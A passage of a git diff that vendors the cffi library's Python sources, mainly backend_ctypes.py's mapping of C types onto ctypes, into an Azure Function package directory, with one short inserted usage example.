sys.version_info >= (3,): + raise OSError("dlopen(None) cannot work on Windows for Python 3 " + "(see http://bugs.python.org/issue23606)") + msg = ("ctypes.util.find_library() did not manage " + "to locate a library called %r" % (name,)) + if first_error is not None: + msg = "%s. 
Additionally, %s" % (first_error, msg) + raise OSError(msg) + return backend.load_library(path, flags) + +def _make_ffi_library(ffi, libname, flags): + backend = ffi._backend + backendlib = _load_backend_lib(backend, libname, flags) + # + def accessor_function(name): + key = 'function ' + name + tp, _ = ffi._parser._declarations[key] + BType = ffi._get_cached_btype(tp) + value = backendlib.load_function(BType, name) + library.__dict__[name] = value + # + def accessor_variable(name): + key = 'variable ' + name + tp, _ = ffi._parser._declarations[key] + BType = ffi._get_cached_btype(tp) + read_variable = backendlib.read_variable + write_variable = backendlib.write_variable + setattr(FFILibrary, name, property( + lambda self: read_variable(BType, name), + lambda self, value: write_variable(BType, name, value))) + # + def addressof_var(name): + try: + return addr_variables[name] + except KeyError: + with ffi._lock: + if name not in addr_variables: + key = 'variable ' + name + tp, _ = ffi._parser._declarations[key] + BType = ffi._get_cached_btype(tp) + if BType.kind != 'array': + BType = model.pointer_cache(ffi, BType) + p = backendlib.load_function(BType, name) + addr_variables[name] = p + return addr_variables[name] + # + def accessor_constant(name): + raise NotImplementedError("non-integer constant '%s' cannot be " + "accessed from a dlopen() library" % (name,)) + # + def accessor_int_constant(name): + library.__dict__[name] = ffi._parser._int_constants[name] + # + accessors = {} + accessors_version = [False] + addr_variables = {} + # + def update_accessors(): + if accessors_version[0] is ffi._cdef_version: + return + # + for key, (tp, _) in ffi._parser._declarations.items(): + if not isinstance(tp, model.EnumType): + tag, name = key.split(' ', 1) + if tag == 'function': + accessors[name] = accessor_function + elif tag == 'variable': + accessors[name] = accessor_variable + elif tag == 'constant': + accessors[name] = accessor_constant + else: + for i, enumname in enumerate(tp.enumerators): + def accessor_enum(name, tp=tp, i=i): + tp.check_not_partial() + library.__dict__[name] = tp.enumvalues[i] + accessors[enumname] = accessor_enum + for name in ffi._parser._int_constants: + accessors.setdefault(name, accessor_int_constant) + accessors_version[0] = ffi._cdef_version + # + def make_accessor(name): + with ffi._lock: + if name in library.__dict__ or name in FFILibrary.__dict__: + return # added by another thread while waiting for the lock + if name not in accessors: + update_accessors() + if name not in accessors: + raise AttributeError(name) + accessors[name](name) + # + class FFILibrary(object): + def __getattr__(self, name): + make_accessor(name) + return getattr(self, name) + def __setattr__(self, name, value): + try: + property = getattr(self.__class__, name) + except AttributeError: + make_accessor(name) + setattr(self, name, value) + else: + property.__set__(self, value) + def __dir__(self): + with ffi._lock: + update_accessors() + return accessors.keys() + def __addressof__(self, name): + if name in library.__dict__: + return library.__dict__[name] + if name in FFILibrary.__dict__: + return addressof_var(name) + make_accessor(name) + if name in library.__dict__: + return library.__dict__[name] + if name in FFILibrary.__dict__: + return addressof_var(name) + raise AttributeError("cffi library has no function or " + "global variable named '%s'" % (name,)) + def __cffi_close__(self): + backendlib.close_lib() + self.__dict__.clear() + # + if isinstance(libname, basestring): + try: + if not 
isinstance(libname, str): # unicode, on Python 2
+ libname = libname.encode('utf-8')
+ FFILibrary.__name__ = 'FFILibrary_%s' % libname
+ except UnicodeError:
+ pass
+ library = FFILibrary()
+ return library, library.__dict__
+
+def _builtin_function_type(func):
+ # a hack to make at least ffi.typeof(builtin_function) work,
+ # if the builtin function was obtained by 'vengine_cpy'.
+ import sys
+ try:
+ module = sys.modules[func.__module__]
+ ffi = module._cffi_original_ffi
+ types_of_builtin_funcs = module._cffi_types_of_builtin_funcs
+ tp = types_of_builtin_funcs[func]
+ except (KeyError, AttributeError, TypeError):
+ return None
+ else:
+ with ffi._lock:
+ return ffi._get_cached_btype(tp)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/backend_ctypes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/backend_ctypes.py
new file mode 100644
index 0000000..3368a2a
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/backend_ctypes.py
@@ -0,0 +1,1121 @@
+import ctypes, ctypes.util, operator, sys
+from . import model
+
+if sys.version_info < (3,):
+ bytechr = chr
+else:
+ unicode = str
+ long = int
+ xrange = range
+ bytechr = lambda num: bytes([num])
+
+class CTypesType(type):
+ pass
+
+class CTypesData(object):
+ __metaclass__ = CTypesType
+ __slots__ = ['__weakref__']
+ __name__ = '<cdata>'
+
+ def __init__(self, *args):
+ raise TypeError("cannot instantiate %r" % (self.__class__,))
+
+ @classmethod
+ def _newp(cls, init):
+ raise TypeError("expected a pointer or array ctype, got '%s'"
+ % (cls._get_c_name(),))
+
+ @staticmethod
+ def _to_ctypes(value):
+ raise TypeError
+
+ @classmethod
+ def _arg_to_ctypes(cls, *value):
+ try:
+ ctype = cls._ctype
+ except AttributeError:
+ raise TypeError("cannot create an instance of %r" % (cls,))
+ if value:
+ res = cls._to_ctypes(*value)
+ if not isinstance(res, ctype):
+ res = cls._ctype(res)
+ else:
+ res = cls._ctype()
+ return res
+
+ @classmethod
+ def _create_ctype_obj(cls, init):
+ if init is None:
+ return cls._arg_to_ctypes()
+ else:
+ return cls._arg_to_ctypes(init)
+
+ @staticmethod
+ def _from_ctypes(ctypes_value):
+ raise TypeError
+
+ @classmethod
+ def _get_c_name(cls, replace_with=''):
+ return cls._reftypename.replace(' &', replace_with)
+
+ @classmethod
+ def _fix_class(cls):
+ cls.__name__ = 'CData<%s>' % (cls._get_c_name(),)
+ cls.__qualname__ = 'CData<%s>' % (cls._get_c_name(),)
+ cls.__module__ = 'ffi'
+
+ def _get_own_repr(self):
+ raise NotImplementedError
+
+ def _addr_repr(self, address):
+ if address == 0:
+ return 'NULL'
+ else:
+ if address < 0:
+ address += 1 << (8*ctypes.sizeof(ctypes.c_void_p))
+ return '0x%x' % address
+
+ def __repr__(self, c_name=None):
+ own = self._get_own_repr()
+ return '<cdata %r %s>' % (c_name or self._get_c_name(), own)
+
+ def _convert_to_address(self, BClass):
+ if BClass is None:
+ raise TypeError("cannot convert %r to an address" % (
+ self._get_c_name(),))
+ else:
+ raise TypeError("cannot convert %r to %r" % (
+ self._get_c_name(), BClass._get_c_name()))
+
+ @classmethod
+ def _get_size(cls):
+ return ctypes.sizeof(cls._ctype)
+
+ def _get_size_of_instance(self):
+ return ctypes.sizeof(self._ctype)
+
+ @classmethod
+ def _cast_from(cls, source):
+ raise TypeError("cannot cast to %r" % (cls._get_c_name(),))
+
+ def _cast_to_integer(self):
+ return self._convert_to_address(None)
+
+ @classmethod
+ def _alignment(cls):
+ return ctypes.alignment(cls._ctype)
+
+ def
__iter__(self): + raise TypeError("cdata %r does not support iteration" % ( + self._get_c_name()),) + + def _make_cmp(name): + cmpfunc = getattr(operator, name) + def cmp(self, other): + v_is_ptr = not isinstance(self, CTypesGenericPrimitive) + w_is_ptr = (isinstance(other, CTypesData) and + not isinstance(other, CTypesGenericPrimitive)) + if v_is_ptr and w_is_ptr: + return cmpfunc(self._convert_to_address(None), + other._convert_to_address(None)) + elif v_is_ptr or w_is_ptr: + return NotImplemented + else: + if isinstance(self, CTypesGenericPrimitive): + self = self._value + if isinstance(other, CTypesGenericPrimitive): + other = other._value + return cmpfunc(self, other) + cmp.func_name = name + return cmp + + __eq__ = _make_cmp('__eq__') + __ne__ = _make_cmp('__ne__') + __lt__ = _make_cmp('__lt__') + __le__ = _make_cmp('__le__') + __gt__ = _make_cmp('__gt__') + __ge__ = _make_cmp('__ge__') + + def __hash__(self): + return hash(self._convert_to_address(None)) + + def _to_string(self, maxlen): + raise TypeError("string(): %r" % (self,)) + + +class CTypesGenericPrimitive(CTypesData): + __slots__ = [] + + def __hash__(self): + return hash(self._value) + + def _get_own_repr(self): + return repr(self._from_ctypes(self._value)) + + +class CTypesGenericArray(CTypesData): + __slots__ = [] + + @classmethod + def _newp(cls, init): + return cls(init) + + def __iter__(self): + for i in xrange(len(self)): + yield self[i] + + def _get_own_repr(self): + return self._addr_repr(ctypes.addressof(self._blob)) + + +class CTypesGenericPtr(CTypesData): + __slots__ = ['_address', '_as_ctype_ptr'] + _automatic_casts = False + kind = "pointer" + + @classmethod + def _newp(cls, init): + return cls(init) + + @classmethod + def _cast_from(cls, source): + if source is None: + address = 0 + elif isinstance(source, CTypesData): + address = source._cast_to_integer() + elif isinstance(source, (int, long)): + address = source + else: + raise TypeError("bad type for cast to %r: %r" % + (cls, type(source).__name__)) + return cls._new_pointer_at(address) + + @classmethod + def _new_pointer_at(cls, address): + self = cls.__new__(cls) + self._address = address + self._as_ctype_ptr = ctypes.cast(address, cls._ctype) + return self + + def _get_own_repr(self): + try: + return self._addr_repr(self._address) + except AttributeError: + return '???' 
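
(A quick way to poke at the generic pointer machinery above from the public API; a minimal sketch, not part of the vendored file, and the cdecl strings are invented. The backend can be forced through FFI's documented `backend=` hook.)

    from cffi import FFI
    from cffi.backend_ctypes import CTypesBackend

    ffi = FFI(backend=CTypesBackend())   # force the pure-ctypes fallback backend
    p = ffi.new("int *", 42)             # a CTypesPtr instance under the hood
    q = ffi.cast("int *", p)             # goes through CTypesGenericPtr._cast_from()
    assert p == q                        # _make_cmp('__eq__') compares raw addresses
    assert int(ffi.cast("intptr_t", p)) == int(ffi.cast("intptr_t", q))
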
+ + def _cast_to_integer(self): + return self._address + + def __nonzero__(self): + return bool(self._address) + __bool__ = __nonzero__ + + @classmethod + def _to_ctypes(cls, value): + if not isinstance(value, CTypesData): + raise TypeError("unexpected %s object" % type(value).__name__) + address = value._convert_to_address(cls) + return ctypes.cast(address, cls._ctype) + + @classmethod + def _from_ctypes(cls, ctypes_ptr): + address = ctypes.cast(ctypes_ptr, ctypes.c_void_p).value or 0 + return cls._new_pointer_at(address) + + @classmethod + def _initialize(cls, ctypes_ptr, value): + if value: + ctypes_ptr.contents = cls._to_ctypes(value).contents + + def _convert_to_address(self, BClass): + if (BClass in (self.__class__, None) or BClass._automatic_casts + or self._automatic_casts): + return self._address + else: + return CTypesData._convert_to_address(self, BClass) + + +class CTypesBaseStructOrUnion(CTypesData): + __slots__ = ['_blob'] + + @classmethod + def _create_ctype_obj(cls, init): + # may be overridden + raise TypeError("cannot instantiate opaque type %s" % (cls,)) + + def _get_own_repr(self): + return self._addr_repr(ctypes.addressof(self._blob)) + + @classmethod + def _offsetof(cls, fieldname): + return getattr(cls._ctype, fieldname).offset + + def _convert_to_address(self, BClass): + if getattr(BClass, '_BItem', None) is self.__class__: + return ctypes.addressof(self._blob) + else: + return CTypesData._convert_to_address(self, BClass) + + @classmethod + def _from_ctypes(cls, ctypes_struct_or_union): + self = cls.__new__(cls) + self._blob = ctypes_struct_or_union + return self + + @classmethod + def _to_ctypes(cls, value): + return value._blob + + def __repr__(self, c_name=None): + return CTypesData.__repr__(self, c_name or self._get_c_name(' &')) + + +class CTypesBackend(object): + + PRIMITIVE_TYPES = { + 'char': ctypes.c_char, + 'short': ctypes.c_short, + 'int': ctypes.c_int, + 'long': ctypes.c_long, + 'long long': ctypes.c_longlong, + 'signed char': ctypes.c_byte, + 'unsigned char': ctypes.c_ubyte, + 'unsigned short': ctypes.c_ushort, + 'unsigned int': ctypes.c_uint, + 'unsigned long': ctypes.c_ulong, + 'unsigned long long': ctypes.c_ulonglong, + 'float': ctypes.c_float, + 'double': ctypes.c_double, + '_Bool': ctypes.c_bool, + } + + for _name in ['unsigned long long', 'unsigned long', + 'unsigned int', 'unsigned short', 'unsigned char']: + _size = ctypes.sizeof(PRIMITIVE_TYPES[_name]) + PRIMITIVE_TYPES['uint%d_t' % (8*_size)] = PRIMITIVE_TYPES[_name] + if _size == ctypes.sizeof(ctypes.c_void_p): + PRIMITIVE_TYPES['uintptr_t'] = PRIMITIVE_TYPES[_name] + if _size == ctypes.sizeof(ctypes.c_size_t): + PRIMITIVE_TYPES['size_t'] = PRIMITIVE_TYPES[_name] + + for _name in ['long long', 'long', 'int', 'short', 'signed char']: + _size = ctypes.sizeof(PRIMITIVE_TYPES[_name]) + PRIMITIVE_TYPES['int%d_t' % (8*_size)] = PRIMITIVE_TYPES[_name] + if _size == ctypes.sizeof(ctypes.c_void_p): + PRIMITIVE_TYPES['intptr_t'] = PRIMITIVE_TYPES[_name] + PRIMITIVE_TYPES['ptrdiff_t'] = PRIMITIVE_TYPES[_name] + if _size == ctypes.sizeof(ctypes.c_size_t): + PRIMITIVE_TYPES['ssize_t'] = PRIMITIVE_TYPES[_name] + + + def __init__(self): + self.RTLD_LAZY = 0 # not supported anyway by ctypes + self.RTLD_NOW = 0 + self.RTLD_GLOBAL = ctypes.RTLD_GLOBAL + self.RTLD_LOCAL = ctypes.RTLD_LOCAL + + def set_ffi(self, ffi): + self.ffi = ffi + + def _get_types(self): + return CTypesData, CTypesType + + def load_library(self, path, flags=0): + cdll = ctypes.CDLL(path, flags) + return CTypesLibrary(self, cdll) + + def 
new_void_type(self): + class CTypesVoid(CTypesData): + __slots__ = [] + _reftypename = 'void &' + @staticmethod + def _from_ctypes(novalue): + return None + @staticmethod + def _to_ctypes(novalue): + if novalue is not None: + raise TypeError("None expected, got %s object" % + (type(novalue).__name__,)) + return None + CTypesVoid._fix_class() + return CTypesVoid + + def new_primitive_type(self, name): + if name == 'wchar_t': + raise NotImplementedError(name) + ctype = self.PRIMITIVE_TYPES[name] + if name == 'char': + kind = 'char' + elif name in ('float', 'double'): + kind = 'float' + else: + if name in ('signed char', 'unsigned char'): + kind = 'byte' + elif name == '_Bool': + kind = 'bool' + else: + kind = 'int' + is_signed = (ctype(-1).value == -1) + # + def _cast_source_to_int(source): + if isinstance(source, (int, long, float)): + source = int(source) + elif isinstance(source, CTypesData): + source = source._cast_to_integer() + elif isinstance(source, bytes): + source = ord(source) + elif source is None: + source = 0 + else: + raise TypeError("bad type for cast to %r: %r" % + (CTypesPrimitive, type(source).__name__)) + return source + # + kind1 = kind + class CTypesPrimitive(CTypesGenericPrimitive): + __slots__ = ['_value'] + _ctype = ctype + _reftypename = '%s &' % name + kind = kind1 + + def __init__(self, value): + self._value = value + + @staticmethod + def _create_ctype_obj(init): + if init is None: + return ctype() + return ctype(CTypesPrimitive._to_ctypes(init)) + + if kind == 'int' or kind == 'byte': + @classmethod + def _cast_from(cls, source): + source = _cast_source_to_int(source) + source = ctype(source).value # cast within range + return cls(source) + def __int__(self): + return self._value + + if kind == 'bool': + @classmethod + def _cast_from(cls, source): + if not isinstance(source, (int, long, float)): + source = _cast_source_to_int(source) + return cls(bool(source)) + def __int__(self): + return int(self._value) + + if kind == 'char': + @classmethod + def _cast_from(cls, source): + source = _cast_source_to_int(source) + source = bytechr(source & 0xFF) + return cls(source) + def __int__(self): + return ord(self._value) + + if kind == 'float': + @classmethod + def _cast_from(cls, source): + if isinstance(source, float): + pass + elif isinstance(source, CTypesGenericPrimitive): + if hasattr(source, '__float__'): + source = float(source) + else: + source = int(source) + else: + source = _cast_source_to_int(source) + source = ctype(source).value # fix precision + return cls(source) + def __int__(self): + return int(self._value) + def __float__(self): + return self._value + + _cast_to_integer = __int__ + + if kind == 'int' or kind == 'byte' or kind == 'bool': + @staticmethod + def _to_ctypes(x): + if not isinstance(x, (int, long)): + if isinstance(x, CTypesData): + x = int(x) + else: + raise TypeError("integer expected, got %s" % + type(x).__name__) + if ctype(x).value != x: + if not is_signed and x < 0: + raise OverflowError("%s: negative integer" % name) + else: + raise OverflowError("%s: integer out of bounds" + % name) + return x + + if kind == 'char': + @staticmethod + def _to_ctypes(x): + if isinstance(x, bytes) and len(x) == 1: + return x + if isinstance(x, CTypesPrimitive): # > + return x._value + raise TypeError("character expected, got %s" % + type(x).__name__) + def __nonzero__(self): + return ord(self._value) != 0 + else: + def __nonzero__(self): + return self._value != 0 + __bool__ = __nonzero__ + + if kind == 'float': + @staticmethod + def _to_ctypes(x): + if 
not isinstance(x, (int, long, float, CTypesData)): + raise TypeError("float expected, got %s" % + type(x).__name__) + return ctype(x).value + + @staticmethod + def _from_ctypes(value): + return getattr(value, 'value', value) + + @staticmethod + def _initialize(blob, init): + blob.value = CTypesPrimitive._to_ctypes(init) + + if kind == 'char': + def _to_string(self, maxlen): + return self._value + if kind == 'byte': + def _to_string(self, maxlen): + return chr(self._value & 0xff) + # + CTypesPrimitive._fix_class() + return CTypesPrimitive + + def new_pointer_type(self, BItem): + getbtype = self.ffi._get_cached_btype + if BItem is getbtype(model.PrimitiveType('char')): + kind = 'charp' + elif BItem in (getbtype(model.PrimitiveType('signed char')), + getbtype(model.PrimitiveType('unsigned char'))): + kind = 'bytep' + elif BItem is getbtype(model.void_type): + kind = 'voidp' + else: + kind = 'generic' + # + class CTypesPtr(CTypesGenericPtr): + __slots__ = ['_own'] + if kind == 'charp': + __slots__ += ['__as_strbuf'] + _BItem = BItem + if hasattr(BItem, '_ctype'): + _ctype = ctypes.POINTER(BItem._ctype) + _bitem_size = ctypes.sizeof(BItem._ctype) + else: + _ctype = ctypes.c_void_p + if issubclass(BItem, CTypesGenericArray): + _reftypename = BItem._get_c_name('(* &)') + else: + _reftypename = BItem._get_c_name(' * &') + + def __init__(self, init): + ctypeobj = BItem._create_ctype_obj(init) + if kind == 'charp': + self.__as_strbuf = ctypes.create_string_buffer( + ctypeobj.value + b'\x00') + self._as_ctype_ptr = ctypes.cast( + self.__as_strbuf, self._ctype) + else: + self._as_ctype_ptr = ctypes.pointer(ctypeobj) + self._address = ctypes.cast(self._as_ctype_ptr, + ctypes.c_void_p).value + self._own = True + + def __add__(self, other): + if isinstance(other, (int, long)): + return self._new_pointer_at(self._address + + other * self._bitem_size) + else: + return NotImplemented + + def __sub__(self, other): + if isinstance(other, (int, long)): + return self._new_pointer_at(self._address - + other * self._bitem_size) + elif type(self) is type(other): + return (self._address - other._address) // self._bitem_size + else: + return NotImplemented + + def __getitem__(self, index): + if getattr(self, '_own', False) and index != 0: + raise IndexError + return BItem._from_ctypes(self._as_ctype_ptr[index]) + + def __setitem__(self, index, value): + self._as_ctype_ptr[index] = BItem._to_ctypes(value) + + if kind == 'charp' or kind == 'voidp': + @classmethod + def _arg_to_ctypes(cls, *value): + if value and isinstance(value[0], bytes): + return ctypes.c_char_p(value[0]) + else: + return super(CTypesPtr, cls)._arg_to_ctypes(*value) + + if kind == 'charp' or kind == 'bytep': + def _to_string(self, maxlen): + if maxlen < 0: + maxlen = sys.maxsize + p = ctypes.cast(self._as_ctype_ptr, + ctypes.POINTER(ctypes.c_char)) + n = 0 + while n < maxlen and p[n] != b'\x00': + n += 1 + return b''.join([p[i] for i in range(n)]) + + def _get_own_repr(self): + if getattr(self, '_own', False): + return 'owning %d bytes' % ( + ctypes.sizeof(self._as_ctype_ptr.contents),) + return super(CTypesPtr, self)._get_own_repr() + # + if (BItem is self.ffi._get_cached_btype(model.void_type) or + BItem is self.ffi._get_cached_btype(model.PrimitiveType('char'))): + CTypesPtr._automatic_casts = True + # + CTypesPtr._fix_class() + return CTypesPtr + + def new_array_type(self, CTypesPtr, length): + if length is None: + brackets = ' &[]' + else: + brackets = ' &[%d]' % length + BItem = CTypesPtr._BItem + getbtype = self.ffi._get_cached_btype + if 
BItem is getbtype(model.PrimitiveType('char')): + kind = 'char' + elif BItem in (getbtype(model.PrimitiveType('signed char')), + getbtype(model.PrimitiveType('unsigned char'))): + kind = 'byte' + else: + kind = 'generic' + # + class CTypesArray(CTypesGenericArray): + __slots__ = ['_blob', '_own'] + if length is not None: + _ctype = BItem._ctype * length + else: + __slots__.append('_ctype') + _reftypename = BItem._get_c_name(brackets) + _declared_length = length + _CTPtr = CTypesPtr + + def __init__(self, init): + if length is None: + if isinstance(init, (int, long)): + len1 = init + init = None + elif kind == 'char' and isinstance(init, bytes): + len1 = len(init) + 1 # extra null + else: + init = tuple(init) + len1 = len(init) + self._ctype = BItem._ctype * len1 + self._blob = self._ctype() + self._own = True + if init is not None: + self._initialize(self._blob, init) + + @staticmethod + def _initialize(blob, init): + if isinstance(init, bytes): + init = [init[i:i+1] for i in range(len(init))] + else: + if isinstance(init, CTypesGenericArray): + if (len(init) != len(blob) or + not isinstance(init, CTypesArray)): + raise TypeError("length/type mismatch: %s" % (init,)) + init = tuple(init) + if len(init) > len(blob): + raise IndexError("too many initializers") + addr = ctypes.cast(blob, ctypes.c_void_p).value + PTR = ctypes.POINTER(BItem._ctype) + itemsize = ctypes.sizeof(BItem._ctype) + for i, value in enumerate(init): + p = ctypes.cast(addr + i * itemsize, PTR) + BItem._initialize(p.contents, value) + + def __len__(self): + return len(self._blob) + + def __getitem__(self, index): + if not (0 <= index < len(self._blob)): + raise IndexError + return BItem._from_ctypes(self._blob[index]) + + def __setitem__(self, index, value): + if not (0 <= index < len(self._blob)): + raise IndexError + self._blob[index] = BItem._to_ctypes(value) + + if kind == 'char' or kind == 'byte': + def _to_string(self, maxlen): + if maxlen < 0: + maxlen = len(self._blob) + p = ctypes.cast(self._blob, + ctypes.POINTER(ctypes.c_char)) + n = 0 + while n < maxlen and p[n] != b'\x00': + n += 1 + return b''.join([p[i] for i in range(n)]) + + def _get_own_repr(self): + if getattr(self, '_own', False): + return 'owning %d bytes' % (ctypes.sizeof(self._blob),) + return super(CTypesArray, self)._get_own_repr() + + def _convert_to_address(self, BClass): + if BClass in (CTypesPtr, None) or BClass._automatic_casts: + return ctypes.addressof(self._blob) + else: + return CTypesData._convert_to_address(self, BClass) + + @staticmethod + def _from_ctypes(ctypes_array): + self = CTypesArray.__new__(CTypesArray) + self._blob = ctypes_array + return self + + @staticmethod + def _arg_to_ctypes(value): + return CTypesPtr._arg_to_ctypes(value) + + def __add__(self, other): + if isinstance(other, (int, long)): + return CTypesPtr._new_pointer_at( + ctypes.addressof(self._blob) + + other * ctypes.sizeof(BItem._ctype)) + else: + return NotImplemented + + @classmethod + def _cast_from(cls, source): + raise NotImplementedError("casting to %r" % ( + cls._get_c_name(),)) + # + CTypesArray._fix_class() + return CTypesArray + + def _new_struct_or_union(self, kind, name, base_ctypes_class): + # + class struct_or_union(base_ctypes_class): + pass + struct_or_union.__name__ = '%s_%s' % (kind, name) + kind1 = kind + # + class CTypesStructOrUnion(CTypesBaseStructOrUnion): + __slots__ = ['_blob'] + _ctype = struct_or_union + _reftypename = '%s &' % (name,) + _kind = kind = kind1 + # + CTypesStructOrUnion._fix_class() + return CTypesStructOrUnion + + def 
new_struct_type(self, name): + return self._new_struct_or_union('struct', name, ctypes.Structure) + + def new_union_type(self, name): + return self._new_struct_or_union('union', name, ctypes.Union) + + def complete_struct_or_union(self, CTypesStructOrUnion, fields, tp, + totalsize=-1, totalalignment=-1, sflags=0, + pack=0): + if totalsize >= 0 or totalalignment >= 0: + raise NotImplementedError("the ctypes backend of CFFI does not support " + "structures completed by verify(); please " + "compile and install the _cffi_backend module.") + struct_or_union = CTypesStructOrUnion._ctype + fnames = [fname for (fname, BField, bitsize) in fields] + btypes = [BField for (fname, BField, bitsize) in fields] + bitfields = [bitsize for (fname, BField, bitsize) in fields] + # + bfield_types = {} + cfields = [] + for (fname, BField, bitsize) in fields: + if bitsize < 0: + cfields.append((fname, BField._ctype)) + bfield_types[fname] = BField + else: + cfields.append((fname, BField._ctype, bitsize)) + bfield_types[fname] = Ellipsis + if sflags & 8: + struct_or_union._pack_ = 1 + elif pack: + struct_or_union._pack_ = pack + struct_or_union._fields_ = cfields + CTypesStructOrUnion._bfield_types = bfield_types + # + @staticmethod + def _create_ctype_obj(init): + result = struct_or_union() + if init is not None: + initialize(result, init) + return result + CTypesStructOrUnion._create_ctype_obj = _create_ctype_obj + # + def initialize(blob, init): + if is_union: + if len(init) > 1: + raise ValueError("union initializer: %d items given, but " + "only one supported (use a dict if needed)" + % (len(init),)) + if not isinstance(init, dict): + if isinstance(init, (bytes, unicode)): + raise TypeError("union initializer: got a str") + init = tuple(init) + if len(init) > len(fnames): + raise ValueError("too many values for %s initializer" % + CTypesStructOrUnion._get_c_name()) + init = dict(zip(fnames, init)) + addr = ctypes.addressof(blob) + for fname, value in init.items(): + BField, bitsize = name2fieldtype[fname] + assert bitsize < 0, \ + "not implemented: initializer with bit fields" + offset = CTypesStructOrUnion._offsetof(fname) + PTR = ctypes.POINTER(BField._ctype) + p = ctypes.cast(addr + offset, PTR) + BField._initialize(p.contents, value) + is_union = CTypesStructOrUnion._kind == 'union' + name2fieldtype = dict(zip(fnames, zip(btypes, bitfields))) + # + for fname, BField, bitsize in fields: + if fname == '': + raise NotImplementedError("nested anonymous structs/unions") + if hasattr(CTypesStructOrUnion, fname): + raise ValueError("the field name %r conflicts in " + "the ctypes backend" % fname) + if bitsize < 0: + def getter(self, fname=fname, BField=BField, + offset=CTypesStructOrUnion._offsetof(fname), + PTR=ctypes.POINTER(BField._ctype)): + addr = ctypes.addressof(self._blob) + p = ctypes.cast(addr + offset, PTR) + return BField._from_ctypes(p.contents) + def setter(self, value, fname=fname, BField=BField): + setattr(self._blob, fname, BField._to_ctypes(value)) + # + if issubclass(BField, CTypesGenericArray): + setter = None + if BField._declared_length == 0: + def getter(self, fname=fname, BFieldPtr=BField._CTPtr, + offset=CTypesStructOrUnion._offsetof(fname), + PTR=ctypes.POINTER(BField._ctype)): + addr = ctypes.addressof(self._blob) + p = ctypes.cast(addr + offset, PTR) + return BFieldPtr._from_ctypes(p) + # + else: + def getter(self, fname=fname, BField=BField): + return BField._from_ctypes(getattr(self._blob, fname)) + def setter(self, value, fname=fname, BField=BField): + # xxx obscure workaround + 
value = BField._to_ctypes(value) + oldvalue = getattr(self._blob, fname) + setattr(self._blob, fname, value) + if value != getattr(self._blob, fname): + setattr(self._blob, fname, oldvalue) + raise OverflowError("value too large for bitfield") + setattr(CTypesStructOrUnion, fname, property(getter, setter)) + # + CTypesPtr = self.ffi._get_cached_btype(model.PointerType(tp)) + for fname in fnames: + if hasattr(CTypesPtr, fname): + raise ValueError("the field name %r conflicts in " + "the ctypes backend" % fname) + def getter(self, fname=fname): + return getattr(self[0], fname) + def setter(self, value, fname=fname): + setattr(self[0], fname, value) + setattr(CTypesPtr, fname, property(getter, setter)) + + def new_function_type(self, BArgs, BResult, has_varargs): + nameargs = [BArg._get_c_name() for BArg in BArgs] + if has_varargs: + nameargs.append('...') + nameargs = ', '.join(nameargs) + # + class CTypesFunctionPtr(CTypesGenericPtr): + __slots__ = ['_own_callback', '_name'] + _ctype = ctypes.CFUNCTYPE(getattr(BResult, '_ctype', None), + *[BArg._ctype for BArg in BArgs], + use_errno=True) + _reftypename = BResult._get_c_name('(* &)(%s)' % (nameargs,)) + + def __init__(self, init, error=None): + # create a callback to the Python callable init() + import traceback + assert not has_varargs, "varargs not supported for callbacks" + if getattr(BResult, '_ctype', None) is not None: + error = BResult._from_ctypes( + BResult._create_ctype_obj(error)) + else: + error = None + def callback(*args): + args2 = [] + for arg, BArg in zip(args, BArgs): + args2.append(BArg._from_ctypes(arg)) + try: + res2 = init(*args2) + res2 = BResult._to_ctypes(res2) + except: + traceback.print_exc() + res2 = error + if issubclass(BResult, CTypesGenericPtr): + if res2: + res2 = ctypes.cast(res2, ctypes.c_void_p).value + # .value: http://bugs.python.org/issue1574593 + else: + res2 = None + #print repr(res2) + return res2 + if issubclass(BResult, CTypesGenericPtr): + # The only pointers callbacks can return are void*s: + # http://bugs.python.org/issue5710 + callback_ctype = ctypes.CFUNCTYPE( + ctypes.c_void_p, + *[BArg._ctype for BArg in BArgs], + use_errno=True) + else: + callback_ctype = CTypesFunctionPtr._ctype + self._as_ctype_ptr = callback_ctype(callback) + self._address = ctypes.cast(self._as_ctype_ptr, + ctypes.c_void_p).value + self._own_callback = init + + @staticmethod + def _initialize(ctypes_ptr, value): + if value: + raise NotImplementedError("ctypes backend: not supported: " + "initializers for function pointers") + + def __repr__(self): + c_name = getattr(self, '_name', None) + if c_name: + i = self._reftypename.index('(* &)') + if self._reftypename[i-1] not in ' )*': + c_name = ' ' + c_name + c_name = self._reftypename.replace('(* &)', c_name) + return CTypesData.__repr__(self, c_name) + + def _get_own_repr(self): + if getattr(self, '_own_callback', None) is not None: + return 'calling %r' % (self._own_callback,) + return super(CTypesFunctionPtr, self)._get_own_repr() + + def __call__(self, *args): + if has_varargs: + assert len(args) >= len(BArgs) + extraargs = args[len(BArgs):] + args = args[:len(BArgs)] + else: + assert len(args) == len(BArgs) + ctypes_args = [] + for arg, BArg in zip(args, BArgs): + ctypes_args.append(BArg._arg_to_ctypes(arg)) + if has_varargs: + for i, arg in enumerate(extraargs): + if arg is None: + ctypes_args.append(ctypes.c_void_p(0)) # NULL + continue + if not isinstance(arg, CTypesData): + raise TypeError( + "argument %d passed in the variadic part " + "needs to be a cdata object 
(got %s)" % + (1 + len(BArgs) + i, type(arg).__name__)) + ctypes_args.append(arg._arg_to_ctypes(arg)) + result = self._as_ctype_ptr(*ctypes_args) + return BResult._from_ctypes(result) + # + CTypesFunctionPtr._fix_class() + return CTypesFunctionPtr + + def new_enum_type(self, name, enumerators, enumvalues, CTypesInt): + assert isinstance(name, str) + reverse_mapping = dict(zip(reversed(enumvalues), + reversed(enumerators))) + # + class CTypesEnum(CTypesInt): + __slots__ = [] + _reftypename = '%s &' % name + + def _get_own_repr(self): + value = self._value + try: + return '%d: %s' % (value, reverse_mapping[value]) + except KeyError: + return str(value) + + def _to_string(self, maxlen): + value = self._value + try: + return reverse_mapping[value] + except KeyError: + return str(value) + # + CTypesEnum._fix_class() + return CTypesEnum + + def get_errno(self): + return ctypes.get_errno() + + def set_errno(self, value): + ctypes.set_errno(value) + + def string(self, b, maxlen=-1): + return b._to_string(maxlen) + + def buffer(self, bptr, size=-1): + raise NotImplementedError("buffer() with ctypes backend") + + def sizeof(self, cdata_or_BType): + if isinstance(cdata_or_BType, CTypesData): + return cdata_or_BType._get_size_of_instance() + else: + assert 